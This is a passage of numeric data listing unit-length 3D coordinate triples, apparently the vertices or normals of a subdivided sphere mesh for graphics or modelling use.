[-0.578244268894,-0.807120084763,-0.119124859571],
[-0.571085453033,-0.797127783298,-0.196083456278],
[-0.62687343359,-0.763553202152,-0.154971644282],
[-0.677466154099,-0.726636230946,0.114190116525],
[-0.68142670393,-0.730884253979,0.0382858961821],
[-0.722495436668,-0.687358558178,0.0744211226702],
[-0.581926107407,-0.81225925684,0.0399611219764],
[-0.581926107407,-0.81225925684,-0.0399611219764],
[-0.634539365768,-0.772890508175,0.0],
[-0.68142670393,-0.730884253979,-0.0382858961821],
[-0.677466154099,-0.726636230946,-0.114190116525],
[-0.722495436668,-0.687358558178,-0.0744211226702],
[-0.634539365768,-0.772890508175,0.0],
[-0.68142670393,-0.730884253979,-0.0382858961821],
[-0.68142670393,-0.730884253979,0.0382858961821],
[-0.436200261116,-0.830415487289,0.346611320972],
[-0.380723625422,-0.869839549065,0.313733518124],
[-0.446935534477,-0.85085272789,0.276221334934],
[-0.3044308424,-0.857896447182,0.413926929235],
[-0.246351331472,-0.891307473183,0.380633711815],
[-0.313436716795,-0.883275330067,0.348686188459],
[-0.321246802807,-0.905284404755,0.277958005667],
[-0.258633822203,-0.935745954514,0.239766731858],
[-0.327503234148,-0.922915279865,0.202408134937],
[-0.313436716795,-0.883275330067,0.348686188459],
[-0.321246802807,-0.905284404755,0.277958005667],
[-0.380723625422,-0.869839549065,0.313733518124],
[-0.174905076623,-0.866019308567,0.468421578407],
[-0.117213711143,-0.892938017845,0.434652328491],
[-0.180623859167,-0.894335091114,0.409316182137],
[-0.0549761541188,-0.858619451523,0.509656965733],
[0.0,-0.8796184659,0.475679844618],
[-0.0568443164229,-0.887796461582,0.456712335348],
[-0.0586068555713,-0.915323853493,0.398431301117],
[0.0,-0.932827115059,0.360324263573],
[-0.0602079555392,-0.940329909325,0.334895044565],
[-0.0568443164229,-0.887796461582,0.456712335348],
[-0.0586068555713,-0.915323853493,0.398431301117],
[-0.117213711143,-0.892938017845,0.434652328491],
[-0.193975359201,-0.960443258286,0.199805602431],
[-0.128498718143,-0.978907585144,0.158833146095],
[-0.196501940489,-0.97295331955,0.121444880962],
[-0.0615878328681,-0.961880862713,0.266443610191],
[0.0,-0.974178731441,0.225778326392],
[-0.0626873448491,-0.979053080082,0.193714544177],
[-0.0634539350867,-0.991025745869,0.117650069296],
[0.0,-0.997029185295,0.0770247355103],
[-0.0638479366899,-0.997179210186,0.0394601933658],
[-0.0626873448491,-0.979053080082,0.193714544177],
[-0.0634539350867,-0.991025745869,0.117650069296],
[-0.128498718143,-0.978907585144,0.158833146095],
[-0.180623859167,-0.894335091114,0.409316182137],
[-0.185843646526,-0.920180141926,0.34457308054],
[-0.246351331472,-0.891307473183,0.380633711815],
[-0.0602079555392,-0.940329909325,0.334895044565],
[-0.0615878328681,-0.961880862713,0.266443610191],
[-0.123895764351,-0.943842172623,0.306287169456],
[-0.190361812711,-0.942551255226,0.274516820908],
[-0.193975359201,-0.960443258286,0.199805602431],
[-0.258633822203,-0.935745954514,0.239766731858],
[-0.123895764351,-0.943842172623,0.306287169456],
[-0.190361812711,-0.942551255226,0.274516820908],
[-0.185843646526,-0.920180141926,0.34457308054],
[-0.446935534477,-0.85085272789,-0.276221334934],
[-0.380723625422,-0.869839549065,-0.313733518124],
[-0.436200261116,-0.830415487289,-0.346611320972],
[-0.327503234148,-0.922915279865,-0.202408134937],
[-0.258633822203,-0.935745954514,-0.239766731858],
[-0.321246802807,-0.905284404755,-0.277958005667],
[-0.313436716795,-0.883275330067,-0.348686188459],
[-0.246351331472,-0.891307473183,-0.380633711815],
[-0.3044308424,-0.857896447182,-0.413926929235],
[-0.321246802807,-0.905284404755,-0.277958005667],
[-0.313436716795,-0.883275330067,-0.348686188459],
[-0.380723625422,-0.869839549065,-0.313733518124],
[-0.196501940489,-0.97295331955,-0.121444880962],
[-0.128498718143,-0.978907585144,-0.158833146095],
[-0.193975359201,-0.960443258286,-0.199805602431],
[-0.0638479366899,-0.997179210186,-0.0394601933658],
[0.0,-0.997029185295,-0.0770247355103],
[-0.0634539350867,-0.991025745869,-0.117650069296],
[-0.0626873448491,-0.979053080082,-0.193714544177],
[0.0,-0.974178731441,-0.225778326392],
[-0.0615878328681,-0.961880862713,-0.266443610191],
[-0.0634539350867,-0.991025745869,-0.117650069296],
[-0.0626873448491,-0.979053080082,-0.193714544177],
[-0.128498718143,-0.978907585144,-0.158833146095],
[-0.180623859167,-0.894335091114,-0.409316182137],
[-0.117213711143,-0.892938017845,-0.434652328491],
[-0.174905076623,-0.866019308567,-0.468421578407],
[-0.0602079555392,-0.940329909325,-0.334895044565],
[0.0,-0.932827115059,-0.360324263573],
[-0.0586068555713,-0.915323853493,-0.398431301117],
[-0.0568443164229,-0.887796461582,-0.456712335348],
[0.0,-0.8796184659,-0.475679844618],
[-0.0549761541188,-0.858619451523,-0.509656965733],
[-0.0586068555713,-0.915323853493,-0.398431301117],
[-0.0568443164229,-0.887796461582,-0.456712335348],
[-0.117213711143,-0.892938017845,-0.434652328491],
[-0.193975359201,-0.960443258286,-0.199805602431],
[-0.190361812711,-0.942551255226,-0.274516820908],
[-0.258633822203,-0.935745954514,-0.239766731858],
[-0.0615878328681,-0.961880862713,-0.266443610191],
[-0.0602079555392,-0.940329909325,-0.334895044565],
[-0.123895764351,-0.943842172623,-0.306287169456],
[-0.185843646526,-0.920180141926,-0.34457308054],
[-0.180623859167,-0.894335091114,-0.409316182137],
[-0.246351331472,-0.891307473183,-0.380633711815],
[-0.123895764351,-0.943842172623,-0.306287169456],
[-0.185843646526,-0.920180141926,-0.34457308054],
[-0.190361812711,-0.942551255226,-0.274516820908],
[-0.446935534477,-0.85085272789,0.276221334934],
[-0.455528259277,-0.867211103439,0.20109423995],
[-0.510783493519,-0.826465010643,0.236761152744],
[-0.327503234148,-0.922915279865,0.202408134937],
[-0.33188316226,-0.935258030891,0.123069040477],
[-0.395605653524,-0.903840482235,0.162998497486],
[-0.461539924145,-0.878655850887,0.122248865664],
[-0.464636415243,-0.88455080986,0.0410230122507],
[-0.524005174637,-0.847858190536,0.0809632539749],
[-0.395605653524,-0.903840482235,0.162998497486],
[-0.461539924145,-0.878655850887,0.122248865664],
[-0.455528259277,-0.867211103439,0.20109423995],
[-0.196501940489,-0.97295331955,0.121444880962],
[-0.197802826762,-0.979394435883,0.0407496243715],
[-0.265506535769,-0.960611641407,0.0820460245013],
[-0.0638479366899,-0.997179210186,0.0394601933658],
[-0.0638479366899,-0.997179210186,-0.0394601933658],
[-0.130150929093,-0.991494178772,0.0],
[-0.197802826762,-0.979394435883,-0.0407496243715],
[-0.196501940489,-0.97295331955,-0.121444880962],
[-0.265506535769,-0.960611641407,-0.0820460245013],
[-0.130150929093,-0.991494178772,0.0],
[-0.197802826762,-0.979394435883,-0.0407496243715],
[-0.197802826762,-0.979394435883,0.0407496243715],
[-0.464636415243,-0.88455080986,-0.0410230122507],
[-0.461539924145,-0.878655850887,-0.122248865664],
[-0.524005174637,-0.847858190536,-0.0809632539749],
[-0.33188316226,-0.935258030891,-0.123069040477],
[-0.327503234148,-0.922915279865,-0.202408134937],
[-0.395605653524,-0.903840482235,-0.162998497486],
[-0.455528259277,-0.867211103439,-0.20109423995],
[-0.446935534477,-0.85085272789,-0.276221334934],
[-0.510783493519,-0.826465010643,-0.236761152744],
[-0.395605653524,-0.903840482235,-0.162998497486],
[-0.455528259277,-0.867211103439,-0.20109423995],
[-0.461539924145,-0.878655850887,-0.122248865664],
[-0.265506535769,-0.960611641407,0.0820460245013],
[-0.334140062332,-0.941618084908,0.04130198434],
[-0.33188316226,-0.935258030891,0.123069040477],
[-0.265506535769,-0.960611641407,-0.0820460245013],
[-0.33188316226,-0.935258030891,-0.123069040477],
[-0.334140062332,-0.941618084908,-0.04130198434],
[-0.400968074799,-0.916092038155,0.0],
[-0.464636415243,-0.88455080986,-0.0410230122507],
[-0.464636415243,-0.88455080986,0.0410230122507],
[-0.334140062332,-0.941618084908,-0.04130198434],
[-0.400968074799,-0.916092038155,0.0],
[-0.334140062332,-0.941618084908,0.04130198434],
[-0.509656965733,-0.0549761541188,0.858619451523],
[-0.548688352108,-0.091976031661,0.830952167511],
[-0.564633131027,-0.0339771322906,0.82464236021],
[-0.468421578407,-0.174905076623,0.866019308567],
[-0.506734728813,-0.217834427953,0.834127128124],
[-0.529480218887,-0.153434738517,0.834331154823],
[-0.588087081909,-0.131048902869,0.798110127449],
[-0.627150595188,-0.171839639544,0.759706020355],
[-0.643326640129,-0.108097285032,0.757922053337],
[-0.529480218887,-0.153434738517,0.834331154823],
[-0.588087081909,-0.131048902869,0.798110127449],
[-0.548688352108,-0.091976031661,0.830952167511],
[-0.413926929235,-0.3044308424,0.857896447182],
[-0.450116455555,-0.352179646492,0.820587992668],
[-0.480284929276,-0.284414708614,0.829719662666],
[-0.346611320972,-0.436200261116,0.830415487289],
[-0.379529476166,-0.486395716667,0.787004828453],
[-0.416404157877,-0.419940322638,0.806385576725],
[-0.485873311758,-0.400663375854,0.776785671711],
[-0.520354926586,-0.44894811511,0.726413309574],
[-0.553625464439,-0.378517180681,0.74177056551],
[-0.416404157877,-0.419940322638,0.806385576725],
[-0.485873311758,-0.400663375854,0.776785671711],
[-0.450116455555,-0.352179646492,0.820587992668],
[-0.665048420429,-0.213841319084,0.715529501438],
[-0.700865805149,-0.256401896477,0.665616393089],
[-0.718357801437,-0.188148602843,0.669747889042],
[-0.618283927441,-0.353819847107,0.701809465885],
[-0.65135627985,-0.398910075426,0.645450055599],
[-0.678621411324,-0.327040165663,0.657660841942],
[-0.733673810959,-0.298754066229,0.610302150249],
[-0.762617051601,-0.340069264174,0.550243675709],
[-0.782811582088,-0.269586592913,0.560828924179],
[-0.678621411324,-0.327040165663,0.657660841942],
[-0.733673810959,-0.298754066229,0.610302150249],
[-0.700865805149,-0.256401896477,0.665616393089],
[-0.480284929276,-0.284414708614,0.829719662666],
[-0.545040607452,-0.26241543889,0.796284377575],
[-0.506734728813,-0.217834427953,0.834127128124],
[-0.553625464439,-0.378517180681,0.74177056551],
[-0.618283927441,-0.353819847107,0.701809465885],
[-0.582528710365,-0.308011889458,0.752189457417],
[-0.606988489628,-0.238753452897,0.757998526096],
[-0.665048420429,-0.213841319084,0.715529501438],
[-0.627150595188,-0.171839639544,0.759706020355],
[-0.582528710365,-0.308011889458,0.752189457417],
[-0.606988489628,-0.238753452897,0.757998526096],
[-0.545040607452,-0.26241543889,0.796284377575],
[-0.269586592913,-0.560828924179,0.782811582088],
[-0.298754066229,-0.610302150249,0.733673810959],
[-0.340069264174,-0.550243675709,0.762617051601],
[-0.188148602843,-0.669747889042,0.718357801437],
[-0.213841319084,-0.715529501438,0.665048420429],
[-0.256401896477,-0.665616393089,0.700865805149],
[-0.327040165663,-0.657660841942,0.678621411324],
[-0.353819847107,-0.701809465885,0.618283927441],
[-0.398910075426,-0.645450055599,0.65135627985],
[-0.256401896477,-0.665616393089,0.700865805149],
[-0.327040165663,-0.657660841942,0.678621411324],
[-0.298754066229,-0.610302150249,0.733673810959],
[-0.108097285032,-0.757922053337,0.643326640129],
[-0.131048902869,-0.798110127449,0.588087081909],
[-0.171839639544,-0.759706020355,0.627150595188],
[-0.0339771322906,-0.82464236021,0.564633131027],
[-0.0549761541188,-0.858619451523,0.509656965733],
[-0.091976031661,-0.830952167511,0.548688352108],
[-0.153434738517,-0.834331154823,0.529480218887],
[-0.174905076623,-0.866019308567,0.468421578407],
[-0.217834427953,-0.834127128124,0.506734728813],
[-0.091976031661,-0.830952167511,0.548688352108],
[-0.153434738517,-0.834331154823,0.529480218887],
[-0.131048902869,-0.798110127449,0.588087081909],
[-0.378517180681,-0.74177056551,0.553625464439],
[-0.400663375854,-0.776785671711,0.485873311758],
[-0.44894811511,-0.726413309574,0.520354926586],
[-0.284414708614,-0.829719662666,0.480284929276],
[-0.3044308424,-0.857896447182,0.413926929235],
[-0.352179646492,-0.820587992668,0.450116455555],
[-0.419940322638,-0.806385576725,0.416404157877],
[-0.436200261116,-0.830415487289,0.346611320972],
[-0.486395716667,-0.787004828453,0.379529476166],
[-0.352179646492,-0.820587992668,0.450116455555],
[-0.419940322638,-0.806385576725,0.416404157877],
[-0.400663375854,-0.776785671711,0.485873311758],
[-0.171839639544,-0.759706020355,0.627150595188],
[-0.238753452897,-0.757998526096,0.606988489628],
[-0.213841319084,-0.715529501438,0.665048420429],
[-0.217834427953,-0.834127128124,0.506734728813],
[-0.284414708614,-0.829719662666,0.480284929276],
[-0.26241543889,-0.796284377575,0.545040607452],
[-0.308011889458,-0.752189457417,0.582528710365],
[-0.378517180681,-0.74177056551,0.553625464439],
[-0.353819847107,-0.701809465885,0.618283927441],
[-0.26241543889,-0.796284377575,0.545040607452],
[-0.308011889458,-0.752189457417,0.582528710365],
[-0.238753452897,-0.757998526096,0.606988489628],
[-0.787004828453,-0.379529476166,0.486395716667],
[-0.806385576725,-0.416404157877,0.419940322638],
[-0.830415487289,-0.346611320972,0.436200261116],
[-0.726413309574,-0.520354926586,0.44894811511],
[-0.74177056551,-0.553625464439,0.378517180681],
[-0.776785671711,-0.485873311758,0.400663375854],
[-0.820587992668,-0.450116455555,0.352179646492],
[-0.829719662666,-0.480284929276,0.284414708614],
[-0.857896447182,-0.413926929235,0.3044308424],
[-0.776785671711,-0.485873311758,0.400663375854],
[-0.820587992668,-0.450116455555,0.352179646492],
[-0.806385576725,-0.416404157877,0.419940322638],
[-0.645450055599,-0.65135627985,0.398910075426],
[-0.657660841942,-0.678621411324,0.327040165663],
[-0.701809465885,-0.618283927441,0.353819847107],
[-0.550243675709,-0.762617051601,0.340069264174],
[-0.560828924179,-0.782811582088,0.269586592913],
[-0.610302150249,-0.733673810959,0.298754066229],
[-0.665616393089,-0.700865805149,0.256401896477],
[-0.669747889042,-0.718357801437,0.188148602843],
[-0.715529501438,-0.665048420429,0.213841319084],
[-0.610302150249,-0.733673810959,0.298754066229],
[-0.665616393089,-0.700865805149,0.256401896477],
[-0.657660841942,-0.678621411324,0.327040165663],
[-0.834127128124,-0.506734728813,0.217834427953],
[-0.834331154823,-0.529480218887,0.153434738517],
[-0.866019308567,-0.468421578407,0.174905076623],
[-0.759706020355,-0.627150595188,0.171839639544],
[-0.757922053337,-0.643326640129,0.108097285032],
[-0.798110127449,-0.588087081909,0.131048902869],
[-0.830952167511,-0.548688352108,0.091976031661],
[-0.82464236021,-0.564633131027,0.0339771322906],
[-0.858619451523,-0.509656965733,0.0549761541188],
[-0.798110127449,-0.588087081909,0.131048902869],
[-0.830952167511,-0.548688352108,0.091976031661],
[-0.834331154823,-0.529480218887,0.153434738517],
[-0.701809465885,-0.618283927441,0.353819847107],
[-0.752189457417,-0.582528710365,0.308011889458],
[-0.74177056551,-0.553625464439,0.378517180681],
[-0.715529501438,-0.665048420429,0.213841319084],
[-0.759706020355,-0.627150595188,0.171839639544],
[-0.757998526096,-0.606988489628,0.238753452897],
[-0.796284377575,-0.545040607452,0.26241543889],
[-0.834127128124,-0.506734728813,0.217834427953],
[-0.829719662666,-0.480284929276,0.284414708614],
[-0.757998526096,-0.606988489628,0.238753452897],
[-0.796284377575,-0.545040607452,0.26241543889],
[-0.752189457417,-0.582528710365,0.308011889458],
[-0.340069264174,-0.550243675709,0.762617051601],
[-0.411682873964,-0.535965919495,0.737060189247],
[-0.379529476166,-0.486395716667,0.787004828453],
[-0.398910075426,-0.645450055599,0.65135627985],
[-0.470621615648,-0.628728508949,0.619044244289],
[-0.44230055809,-0.58378881216,0.680853009224],
[-0.483050197363,-0.517854511738,0.706037700176],
[-0.552667617798,-0.495975226164,0.669751524925],
[-0.520354926586,-0.44894811511,0.726413309574],
[-0.44230055809,-0.58378881216,0.680853009224],
[-0.483050197363,-0.517854511738,0.706037700176],
[-0.411682873964,-0.535965919495,0.737060189247],
[-0.44894811511,-0.726413309574,0.520354926586],
[-0.517854511738,-0.706037700176,0.483050197363],
[-0.495975226164,-0.669751524925,0.552667617798],
[-0.486395716667,-0.787004828453,0.379529476166],
[-0.550243675709,-0.762617051601,0.340069264174],
[-0.535965919495,-0.737060189247,0.411682873964],
[-0.58378881216,-0.680853009224,0.44230055809],
[-0.645450055599,-0.65135627985,0.398910075426],
[-0.628728508949,-0.619044244289,0.470621615648],
[-0.535965919495,-0.737060189247,0.411682873964],
[-0.58378881216,-0.680853009224,0.44230055809],
[-0.517854511738,-0.706037700176,0.483050197363],
[-0.619044244289,-0.470621615648,0.628728508949],
[-0.680853009224,-0.44230055809,0.58378881216],
[-0.65135627985,-0.398910075426,0.645450055599],
[-0.669751524925,-0.552667617798,0.495975226164],
[-0.726413309574,-0.520354926586,0.44894811511],
[-0.706037700176,-0.483050197363,0.517854511738],
[-0.737060189247,-0.411682873964,0.535965919495],
[-0.787004828453,-0.379529476166,0.486395716667],
[-0.762617051601,-0.340069264174,0.550243675709],
[-0.706037700176,-0.483050197363,0.517854511738],
[-0.737060189247,-0.411682873964,0.535965919495],
[-0.680853009224,-0.44230055809,0.58378881216],
[-0.495975226164,-0.669751524925,0.552667617798],
[-0.540649950504,-0.607478022575,0.581951975822],
[-0.470621615648,-0.628728508949,0.619044244289],
[-0.628728508949,-0.619044244289,0.470621615648],
[-0.669751524925,-0.552667617798,0.495975226164],
[-0.607478022575,-0.581951975822,0.540649950504],
[-0.581951975822,-0.540649950504,0.607478022575],
[-0.619044244289,-0.470621615648,0.628728508949],
[-0.552667617798,-0.495975226164,0.669751524925],
[-0.607478022575,-0.581951975822,0.540649950504],
[-0.581951975822,-0.540649950504,0.607478022575],
[-0.540649950504,-0.607478022575,0.581951975822],
[-0.0339771322906,-0.82464236021,0.564633131027],
[0.0,-0.79582041502,0.605532705784],
[0.0339771322906,-0.82464236021,0.564633131027],
[-0.108097285032,-0.757922053337,0.643326640129],
[-0.0744211226702,-0.722495436668,0.687358558178],
[-0.0362210273743,-0.761889100075,0.646693944931],
[0.0362210273743,-0.761889100075,0.646693944931],
[0.0744211226702,-0.722495436668,0.687358558178],
[0.108097285032,-0.757922053337,0.643326640129],
[-0.0362210273743,-0.761889100075,0.646693944931],
[0.0362210273743,-0.761889100075,0.646693944931],
[0.0,-0.79582041502,0.605532705784],
[-0.188148602843,-0.669747889042,0.718357801437],
[-0.154971644282,-0.62687343359,0.763553202152],
[-0.114190116525,-0.677466154099,0.726636230946],
[-0.269586592913,-0.560828924179,0.782811582088],
[-0.236761152744,-0.510783493519,0.826465010643],
[-0.196083456278,-0.571085453033,0.797127783298],
[-0.119124859571,-0.578244268894,0.807120084763],
[-0.0809632539749,-0.524005174637,0.847858190536],
[-0.0399611219764,-0.581926107407,0.81225925684],
[-0.196083456278,-0.571085453033,0.797127783298],
[-0.119124859571,-0.578244268894,0.807120084763],
[-0.154971644282,-0.62687343359,0.763553202152],
[0.114190116525,-0.677466154099,0.726636230946],
[0.154971644282,-0.62687343359,0.763553202152],
[0.188148602843,-0.669747889042,0.718357801437],
[0.0399611219764,-0.581926107407,0.81225925684],
[0.0809632539749,-0.524005174637,0.847858190536],
[0.119124859571,-0.578244268894,0.807120084763],
[0.196083456278,-0.571085453033,0.797127783298],
[0.236761152744,-0.510783493519,0.826465010643],
[0.269586592913,-0.560828924179,0.782811582088],
[0.119124859571,-0.578244268894,0.807120084763],
[0.196083456278,-0.571085453033,0.797127783298],
[0.154971644282,-0.62687343359,0.763553202152],
[-0.114190116525,-0.677466154099,0.726636230946],
[-0.0382858961821,-0.68142670393,0.730884253979],
[-0.0744211226702,-0.722495436668,0.687358558178],
[-0.0399611219764,-0.581926107407,0.81225925684],
[0.0399611219764,-0.581926107407,0.81225925684],
[0.0,-0.634539365768,0.772890508175],
[0.0382858961821,-0.68142670393,0.730884253979],
[0.114190116525,-0.677466154099,0.726636230946],
[0.0744211226702,-0.722495436668,0.687358558178],
[0.0,-0.634539365768,0.772890508175],
[0.0382858961821,-0.68142670393,0.730884253979],
[-0.0382858961821,-0.68142670393,0.730884253979],
[-0.346611320972,-0.436200261116,0.830415487289],
[-0.313733518124,-0.380723625422,0.869839549065],
[-0.276221334934,-0.446935534477,0.85085272789],
[-0.413926929235,-0.3044308424,0.857896447182],
[-0.380633711815,-0.246351331472,0.891307473183],
[-0.348686188459,-0.313436716795,0.883275330067],
[-0.277958005667,-0.321246802807,0.905284404755],
[-0.239766731858,-0.258633822203,0.935745954514],
[-0.202408134937,-0.327503234148,0.922915279865],
[-0.348686188459,-0.313436716795,0.883275330067],
[-0.277958005667,-0.321246802807,0.905284404755],
[-0.313733518124,-0.380723625422,0.869839549065],
[-0.468421578407,-0.174905076623,0.866019308567],
[-0.434652328491,-0.117213711143,0.892938017845],
[-0.409316182137,-0.180623859167,0.894335091114],
[-0.509656965733,-0.0549761541188,0.858619451523],
[-0.475679844618,0.0,0.8796184659],
[-0.456712335348,-0.0568443164229,0.887796461582],
[-0.398431301117,-0.0586068555713,0.915323853493],
[-0.360324263573,0.0,0.932827115059],
[-0.334895044565,-0.0602079555392,0.940329909325],
[-0.456712335348,-0.0568443164229,0.887796461582],
[-0.398431301117,-0.0586068555713,0.915323853493],
[-0.434652328491,-0.117213711143,0.892938017845],
[-0.199805602431,-0.193975359201,0.960443258286],
[-0.158833146095,-0.128498718143,0.978907585144],
[-0.121444880962,-0.196501940489,0.97295331955],
[-0.266443610191,-0.0615878328681,0.961880862713],
[-0.225778326392,0.0,0.974178731441],
[-0.193714544177,-0.0626873448491,0.979053080082],
[-0.117650069296,-0.0634539350867,0.991025745869],
[-0.0770247355103,0.0,0.997029185295],
[-0.0394601933658,-0.0638479366899,0.997179210186],
[-0.193714544177,-0.0626873448491,0.979053080082],
[-0.117650069296,-0.0634539350867,0.991025745869],
[-0.158833146095,-0.128498718143,0.978907585144],
[-0.409316182137,-0.180623859167,0.894335091114],
[-0.34457308054,-0.185843646526,0.920180141926],
[-0.380633711815,-0.246351331472,0.891307473183],
[-0.334895044565,-0.0602079555392,0.940329909325],
[-0.266443610191,-0.0615878328681,0.961880862713],
[-0.306287169456,-0.123895764351,0.943842172623],
[-0.274516820908,-0.190361812711,0.942551255226],
[-0.199805602431,-0.193975359201,0.960443258286],
[-0.239766731858,-0.258633822203,0.935745954514],
[-0.306287169456,-0.123895764351,0.943842172623],
[-0.274516820908,-0.190361812711,0.942551255226],
[-0.34457308054,-0.185843646526,0.920180141926],
[0.276221334934,-0.446935534477,0.85085272789],
[0.313733518124,-0.380723625422,0.869839549065],
[0.346611320972,-0.436200261116,0.830415487289],
[0.202408134937,-0.327503234148,0.922915279865],
[0.239766731858,-0.258633822203,0.935745954514],
[0.277958005667,-0.321246802807,0.905284404755],
[0.348686188459,-0.313436716795,0.883275330067],
[0.380633711815,-0.246351331472,0.891307473183],
[0.413926929235,-0.3044308424,0.857896447182],
[0.277958005667,-0.321246802807,0.905284404755],
[0.348686188459,-0.313436716795,0.883275330067],
[0.313733518124,-0.380723625422,0.869839549065],
[0.121444880962,-0.196501940489,0.97295331955],
[0.158833146095,-0.128498718143,0.978907585144],
[0.199805602431,-0.193975359201,0.960443258286],
[0.0394601933658,-0.0638479366899,0.997179210186],
[0.0770247355103,0.0,0.997029185295],
[0.117650069296,-0.0634539350867,0.991025745869],
[0.193714544177,-0.0626873448491,0.979053080082],
[0.225778326392,0.0,0.974178731441],
[0.266443610191,-0.0615878328681,0.961880862713],
[0.117650069296,-0.0634539350867,0.991025745869],
[0.193714544177,-0.0626873448491,0.979053080082],
[0.158833146095,-0.128498718143,0.978907585144],
[0.409316182137,-0.180623859167,0.894335091114],
[0.434652328491,-0.117213711143,0.892938017845],
[0.468421578407,-0.174905076623,0.866019308567],
[0.334895044565,-0.0602079555392,0.940329909325],
[0.360324263573,0.0,0.932827115059],
[0.398431301117,-0.0586068555713,0.915323853493],
[0.456712335348,-0.0568443164229,0.887796461582],
[0.475679844618,0.0,0.8796184659],
[0.509656965733,-0.0549761541188,0.858619451523],
[0.398431301117,-0.0586068555713,0.915323853493],
[0.456712335348,-0.0568443164229,0.887796461582],
[0.434652328491,-0.117213711143,0.892938017845],
[0.199805602431,-0.193975359201,0.960443258286],
[0.274516820908,-0.190361812711,0.942551255226],
[0.239766731858,-0.258633822203,0.935745954514],
[0.266443610191,-0.0615878328681,0.961880862713],
[0.334895044565,-0.0602079555392,0.940329909325],
[0.306287169456,-0.123895764351,0.943842172623],
[0.34457308054,-0.185843646526,0.920180141926],
[0.409316182137,-0.180623859167,0.894335091114],
[0.380633711815,-0.246351331472,0.891307473183],
[0.306287169456,-0.123895764351,0.943842172623],
[0.34457308054,-0.185843646526,0.920180141926],
[0.274516820908,-0.190361812711,0.942551255226],
[-0.276221334934,-0.446935534477,0.85085272789],
[-0.20109423995,-0.455528259277,0.867211103439],
[-0.236761152744,-0.510783493519,0.826465010643],
[-0.202408134937,-0.327503234148,0.922915279865],
[-0.123069040477,-0.33188316226,0.935258030891],
[-0.162998497486,-0.395605653524,0.903840482235],
[-0.122248865664,-0.461539924145,0.878655850887],
[-0.0410230122507,-0.464636415243,0.88455080986],
[-0.0809632539749,-0.524005174637,0.847858190536],
[-0.162998497486,-0.395605653524,0.903840482235],
[-0.122248865664,-0.461539924145,0.878655850887],
[-0.20109423995,-0.455528259277,0.867211103439],
[-0.121444880962,-0.196501940489,0.97295331955],
[-0.0407496243715,-0.197802826762,0.979394435883],
[-0.0820460245013,-0.265506535769,0.960611641407],
[-0.0394601933658,-0.0638479366899,0.997179210186],
[0.0394601933658,-0.0638479366899,0.997179210186],
[0.0,-0.130150929093,0.991494178772],
[0.0407496243715,-0.197802826762,0.979394435883],
[0.121444880962,-0.196501940489,0.97295331955],
[0.0820460245013,-0.265506535769,0.960611641407],
[0.0,-0.130150929093,0.991494178772],
[0.0407496243715,-0.197802826762,0.979394435883],
[-0.0407496243715,-0.197802826762,0.979394435883],
[0.0410230122507,-0.464636415243,0.88455080986],
[0.122248865664,-0.461539924145,0.878655850887],
[0.0809632539749,-0.524005174637,0.847858190536],
[0.123069040477,-0.33188316226,0.935258030891],
[0.202408134937,-0.327503234148,0.922915279865],
[0.162998497486,-0.395605653524,0.903840482235],
[0.20109423995,-0.455528259277,0.867211103439],
[0.276221334934,-0.446935534477,0.85085272789],
[0.236761152744,-0.510783493519,0.826465010643],
[0.162998497486,-0.395605653524,0.903840482235],
[0.20109423995,-0.455528259277,0.867211103439],
[0.122248865664,-0.461539924145,0.878655850887],
[-0.0820460245013,-0.265506535769,0.960611641407],
[-0.04130198434,-0.334140062332,0.941618084908],
[-0.123069040477,-0.33188316226,0.935258030891],
[0.0820460245013,-0.265506535769,0.960611641407],
[0.123069040477,-0.33188316226,0.935258030891],
[0.04130198434,-0.334140062332,0.941618084908],
[0.0,-0.400968074799,0.916092038155],
[0.0410230122507,-0.464636415243,0.88455080986],
[-0.0410230122507,-0.464636415243,0.88455080986],
[0.04130198434,-0.334140062332,0.941618084908],
[0.0,-0.400968074799,0.916092038155],
[-0.04130198434,-0.334140062332,0.941618084908],
[0.0339771322906,-0.82464236021,0.564633131027],
[0.091976031661,-0.830952167511,0.548688352108],
[0.0549761541188,-0.858619451523,0.509656965733],
[0.108097285032,-0.757922053337,0.643326640129],
[0.171839639544,-0.759706020355,0.627150595188],
[0.131048902869,-0.798110127449,0.588087081909],
[0.153434738517,-0.834331154823,0.529480218887],
[0.217834427953,-0.834127128124,0.506734728813],
[0.174905076623,-0.866019308567,0.468421578407],
[0.131048902869,-0.798110127449,0.588087081909],
[0.153434738517,-0.834331154823,0.529480218887],
[0.091976031661,-0.830952167511,0.548688352108],
[0.188148602843,-0.669747889042,0.718357801437],
[0.256401896477,-0.665616393089,0.700865805149],
[0.213841319084,-0.715529501438,0.665048420429],
[0.269586592913,-0.560828924179,0.782811582088],
[0.340069264174,-0.550243675709,0.762617051601],
[0.298754066229,-0.610302150249,0.733673810959],
[0.327040165663,-0.657660841942,0.678621411324],
[0.398910075426,-0.645450055599,0.65135627985],
[0.353819847107,-0.701809465885,0.618283927441],
[0.298754066229,-0.610302150249,0.733673810959],
[0.327040165663,-0.657660841942,0.678621411324],
[0.256401896477,-0.665616393089,0.700865805149],
[0.284414708614,-0.829719662666,0.480284929276],
[0.352179646492,-0.820587992668,0.450116455555],
[0.3044308424,-0.857896447182,0.413926929235],
[0.378517180681,-0.74177056551,0.553625464439],
[0.44894811511,-0.726413309574,0.520354926586],
[0.400663375854,-0.776785671711,0.485873311758],
[0.419940322638,-0.806385576725,0.416404157877],
[0.486395716667,-0.787004828453,0.379529476166],
[0.436200261116,-0.830415487289,0.346611320972],
[0.400663375854,-0.776785671711,0.485873311758],
[0.419940322638,-0.806385576725,0.416404157877],
[0.352179646492,-0.820587992668,0.450116455555],
[0.213841319084,-0.715529501438,0.665048420429],
[0.238753452897,-0.757998526096,0.606988489628],
[0.171839639544,-0.759706020355,0.627150595188],
[0.353819847107,-0.701809465885,0.618283927441],
[0.378517180681,-0.74177056551,0.553625464439],
[0.308011889458,-0.752189457417,0.582528710365],
[0.26241543889,-0.796284377575,0.545040607452],
[0.284414708614,-0.829719662666,0.480284929276],
[0.217834427953,-0.834127128124,0.506734728813],
[0.308011889458,-0.752189457417,0.582528710365],
[0.26241543889,-0.796284377575,0.545040607452],
[0.238753452897,-0.757998526096,0.606988489628],
[0.346611320972,-0.436200261116,0.830415487289],
[0.416404157877,-0.419940322638,0.806385576725],
[0.379529476166,-0.486395716667,0.787004828453],
[0.413926929235,-0.3044308424,0.857896447182],
[0.480284929276,-0.284414708614,0.829719662666],
[0.450116455555,-0.352179646492,0.820587992668],
[0.485873311758,-0.400663375854,0.776785671711],
[0.553625464439,-0.378517180681,0.74177056551],
[0.520354926586,-0.44894811511,0.726413309574],
[0.450116455555,-0.352179646492,0.820587992668],
[0.485873311758,-0.400663375854,0.776785671711],
